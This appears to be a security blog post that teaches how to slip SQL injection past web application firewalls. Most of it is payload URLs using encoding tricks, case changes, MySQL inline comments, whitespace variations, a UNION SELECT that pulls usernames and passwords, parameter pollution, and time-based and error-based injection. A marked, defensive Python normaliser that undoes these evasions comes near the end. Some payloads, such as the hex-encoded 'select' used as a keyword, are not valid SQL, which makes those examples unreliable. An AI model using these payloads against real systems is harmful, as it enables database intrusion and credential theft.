Blog | G5 Cyber Security

Bypassing WAF Filters in SQL Injection

TL;DR

Web Application Firewalls (WAFs) often block common SQL injection attempts. This guide shows techniques to bypass these filters, focusing on encoding, character manipulation, and alternative syntax. Remember ethical hacking principles – only test systems you have permission to access.

Understanding the Problem

A WAF sits between a user and a web server, inspecting incoming requests for malicious patterns (like SQL injection). It’s designed to block these attacks before they reach the database. Bypassing a WAF means finding ways to send SQL code that the WAF doesn’t recognise as harmful.

Solution Guide

  1. Identify the Filter Rules: Before attempting bypasses, try basic payloads to understand what the WAF blocks. Common blocked keywords include SELECT, UNION, DROP, and comments (--, /* */).
  2. Character Encoding: WAFs often struggle with different character encodings.
    • URL Encoding: Try encoding characters like spaces (%20), single quotes (%27), double quotes (%22) and equals signs (%3D).
      http://example.com/page?id=1%27
    • Hex Encoding: Encode parts of your payload in hexadecimal.
      http://example.com/page?id=0x41'
    • Unicode Encoding: Use Unicode representations of characters. Note that %uXXXX is a non-standard form that only some servers (notably IIS) decode; a WAF that does not decode it sees only literal text.
      http://example.com/page?id=%u0027
  3. Case Manipulation: Some WAFs are case-sensitive. Try variations like SeLeCt, sElEcT, or select.
    http://example.com/page?id=1 SeLeCt * FROM users
  4. Comment Exploitation: WAFs may not fully understand nested comments.
    • Inline Comments: Use multiple inline comments to break up keywords. The /*! ... */ form is a MySQL extension: the server executes the text inside the comment, while a WAF that treats it as an ordinary comment discards it.
      http://example.com/page?id=1 /*!SELECT*/ * /*!FROM*/ users
    • Nested Comments: Try nesting comments.
      http://example.com/page?id=1/* comment */SELECT/* comment */* FROM users
  5. Whitespace Variations: WAFs may not handle extra whitespace correctly.
    • Multiple Spaces: Add multiple spaces between keywords and identifiers.
      http://example.com/page?id=1  SELECT * FROM users
    • Tab Characters (%09): Use tab characters instead of spaces.
      http://example.com/page?id=1%09SELECT * FROM users
  6. Alternative Syntax: Explore different SQL syntax that achieves the same result.
    • Using Hexadecimal Representation of Strings:
      http://example.com/page?id=1' AND 0x73656c656374 * FROM users WHERE 1=1
    • Concatenation: Use string concatenation operators (e.g., || in PostgreSQL, + in SQL Server).
      http://example.com/page?id=1' + ' UNION SELECT username, password FROM users -- '
  7. HTTP Parameter Pollution (HPP): Send the same parameter multiple times with different values. Frameworks differ in whether they keep the first value, the last value, or join all of them, so the WAF and the application may not see the same value.
    http://example.com/page?id=1&id=%27
  8. Time-Based Blind SQL Injection: If direct data extraction is blocked, use time delays to infer information.
    http://example.com/page?id=1' AND IF(substring(version(),1,1)='5',sleep(5),0)-- '
  9. Error-Based SQL Injection: If the database returns errors, craft payloads to reveal information.
    http://example.com/page?id=1' AND (SELECT 1 FROM users WHERE username = 'admin')-- '
  10. Use Burp Suite or OWASP ZAP: These tools can help automate the process of testing different payloads and encoding schemes.
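The defensive counterpart to the list above is to canonicalise a request before matching it. The following is an added example (not code from the original post): a normaliser that undoes the evasions listed here (URL and %u encoding, case changes, comment splitting, whitespace tricks, repeated parameters) so that a simple pattern check sees the same SQL the database would. The keyword list is a hypothetical stand-in for a real rule set.

```python
"""Canonicalise query-string values before keyword matching (added example)."""
import re
from urllib.parse import parse_qsl, unquote

# Hypothetical keyword list for illustration; a real WAF uses far richer rules.
SQL_KEYWORDS = ("select", "union", "drop", "sleep(", "--")

# Non-standard IIS-style %uXXXX escapes that urllib leaves untouched.
_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")


def normalise(value: str, max_rounds: int = 3) -> str:
    """Decode repeatedly, strip comments, fold case and collapse whitespace."""
    for _ in range(max_rounds):  # bounded: double/triple encoding is common
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded)
        if decoded == value:
            break
        value = decoded
    # MySQL /*!12345 ... */ executes its body: keep the body, drop the markers.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Ordinary /* ... */ comments are equivalent to whitespace.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # Tabs, newlines and runs of spaces all become a single space.
    value = re.sub(r"\s+", " ", value)
    return value.strip().lower()


def suspicious_params(query: str) -> list:
    """Return (name, normalised value) for every value containing a keyword.

    parse_qsl keeps every occurrence of a repeated name, so parameter
    pollution (id=1&id=...) is checked value by value rather than only
    the first or last copy.
    """
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        norm = normalise(raw)
        if any(k in norm for k in SQL_KEYWORDS):
            hits.append((name, norm))
    return hits


if __name__ == "__main__":
    # Constructed sample inputs modelled on the list above.
    for q in ("id=1%09SeLeCt%20*%20FROM%20users",
              "id=1/*!SELECT*/%20*%20/*!FROM*/%20users",
              "id=1&id=%27%20UNION%20SELECT%201"):
        print(q, "->", suspicious_params(q))
```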

Important Note: WAFs are constantly evolving. Techniques that work today may not work tomorrow. Ethical considerations are paramount – always obtain explicit permission before testing any system for vulnerabilities.
